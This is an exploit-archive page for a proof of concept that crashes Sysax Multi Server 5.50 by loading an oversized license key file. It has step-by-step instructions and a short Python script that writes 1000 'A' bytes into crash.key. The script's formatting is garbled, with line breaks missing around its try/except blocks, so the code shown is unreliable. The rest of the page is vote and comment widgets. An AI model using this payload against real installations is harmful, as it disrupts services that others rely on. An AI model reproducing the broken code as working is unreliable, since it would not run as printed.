Sysax Multi Server 5.50 Denial of Service

2020.01.25

Credit: Shailesh Kumavat

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC)
# Google Dork: NA
# Date: 2020-01-20
# Exploit Author: Shailesh Kumavat
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download.htm#sysaxserv
# Version: Sysax Multi Server 5.50
# Tested on: WIndow 7
# CVE : [if applicable]
1) Download software install in window 7
2)run software then click install license
3) upload crash.key file and it will show run again this program
4 ) program crash , never run
#!/usr/bin/python
buffer = "A" * 1000
payload = buffertry:
f=open("crash.key","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")except:
print("File cannot be created.")

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Sysax Multi Server 5.50 Denial of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.